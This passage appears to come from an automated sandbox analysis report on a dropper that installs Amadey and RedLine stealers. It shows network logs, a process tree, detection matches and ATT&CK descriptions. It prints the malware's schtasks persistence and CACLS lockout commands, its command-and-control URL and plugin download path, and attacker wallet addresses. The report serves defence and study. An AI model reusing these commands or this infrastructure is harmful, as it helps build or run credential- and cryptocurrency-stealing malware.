Feb 7, 2023 19:57:03.765290976 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765295029 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765325069 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765333891 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765357018 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765387058 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765396118 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765418053 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765439034 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765448093 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765480995 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765492916 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765548944 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.802165985 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.803030968 CET	49699	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828742981 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828780890 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828807116 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828826904 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828830957 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828857899 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828857899 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828885078 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828902006 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828911066 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828929901 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828936100 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828967094 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828972101 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828982115 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828999043 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.829029083 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.861804008 CET	80	49698	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.861861944 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.863467932 CET	80	49699	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.863574028 CET	49699	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.880243063 CET	49699	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891520023 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891555071 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891587019 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891617060 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891618013 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891623974 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891650915 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891653061 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891674995 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891681910 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891702890 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891709089 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891721010 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891736031 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891761065 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891777039 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891787052 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891813040 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891813040 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891849041 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891874075 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.940934896 CET	80	49699	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.943756104 CET	80	49699	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.943857908 CET	49699	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.954431057 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954458952 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954482079 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954504013 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954525948 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954547882 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954569101 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954591036 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954600096 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.954613924 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954638004 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954653025 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.954659939 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954675913 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.954719067 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.017163992 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017234087 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017262936 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017290115 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017316103 CET	80	49697	62.204.41.4	192.168.2.5

HTTP Request Dependency Graph

62.204.41.4

Target ID:	0
Start time:	19:56:30
Start date:	07/02/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x70000
File size:	537600 bytes
MD5 hash:	B16D53F153404F5825765F11AB2B6827
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: bKug.exePID: 2188, Parent PID: 4604

General

Target ID:	1
Start time:	19:56:30
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
Imagebase:	0x1080000
File size:	346112 bytes
MD5 hash:	E2A785D0666AFD7BBE63FAF32216A8AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs
Reputation:	low

Analysis Process: aKuf.exePID: 4916, Parent PID: 2188

General

Target ID:	2
Start time:	19:56:31
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
Imagebase:	0x400000
File size:	251392 bytes
MD5 hash:	CCFC1E2539F9382400217DF5AE6D1D8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 49%, ReversingLabs
Reputation:	low

Analysis Process: rundll32.exePID: 4724, Parent PID: 3324

General

Target ID:	3
Start time:	19:56:43
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff79b0e0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: nika.exePID: 5316, Parent PID: 2188

General

Target ID:	4
Start time:	19:56:49
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Imagebase:	0x4e0000
File size:	11264 bytes
MD5 hash:	7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	moderate

Analysis Process: rundll32.exePID: 5352, Parent PID: 3324

General

Target ID:	5
Start time:	19:56:51
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:	0x7ff79b0e0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: xriv.exePID: 3096, Parent PID: 4604

General

Target ID:	6
Start time:	19:57:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Imagebase:	0x8c0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000000.363553384.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Analysis Process: mnolyk.exePID: 2328, Parent PID: 3096

General

Target ID:	7
Start time:	19:57:01
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Imagebase:	0xad0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000000.365076498.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.822951926.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Analysis Process: schtasks.exePID: 4484, Parent PID: 2328

General

Target ID:	8
Start time:	19:57:01
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Imagebase:	0xfd0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 5076, Parent PID: 2328

General

Target ID:	9
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 4968, Parent PID: 4484

General

Target ID:	10
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2332, Parent PID: 5076

General

Target ID:	11
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 4512, Parent PID: 5076

General

Target ID:	12
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 5860, Parent PID: 5076

General

Target ID:	13
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "mnolyk.exe" /P "user:N"
Imagebase:	0x11f0000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 5856, Parent PID: 5076

General

Target ID:	14
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "mnolyk.exe" /P "user:R" /E
Imagebase:	0x11f0000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 3484, Parent PID: 5076

General

Target ID:	15
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 3236, Parent PID: 5076

General

Target ID:	16
Start time:	19:57:03
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\4b9a106e76" /P "user:N"
Imagebase:	0x11f0000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 3580, Parent PID: 5076

General

Target ID:	17
Start time:	19:57:03
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\4b9a106e76" /P "user:R" /E
Imagebase:	0x11f0000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: mnolyk.exePID: 4760, Parent PID: 1084

General

Target ID:	18
Start time:	19:57:03
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0xad0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.375060444.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000000.369836464.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Analysis Process: rundll32.exePID: 4716, Parent PID: 2328

General

Target ID:	19
Start time:	19:57:04
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Imagebase:	0x1040000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: mnolyk.exePID: 4500, Parent PID: 1084

General

Target ID:	25
Start time:	19:58:01
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0xad0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000002.494123229.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000000.493543411.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Analysis Process: mnolyk.exePID: 3808, Parent PID: 1084

General

Target ID:	27
Start time:	19:59:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0xad0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000002.620289864.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000000.619946114.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Analysis Process: mnolyk.exePID: 1104, Parent PID: 1084

General

Target ID:	29
Start time:	20:00:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0xad0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000002.755532601.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000000.748563706.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Disassembly

⊘No disassembly

Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	Avira URL Cloud: Label: malware
Source: 62.204.41.4/Gol478Ns/index.php	Avira URL Cloud: Label: malware
Source: http://62.204.41.4/Gol478Ns/index.php	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	ReversingLabs: Detection: 80%

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Joe Sandbox ML: detected

Source: 0.3.file.exe.4b3b820.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
Source: 19.2.rundll32.exe.6e7c0000.0.unpack	Malware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
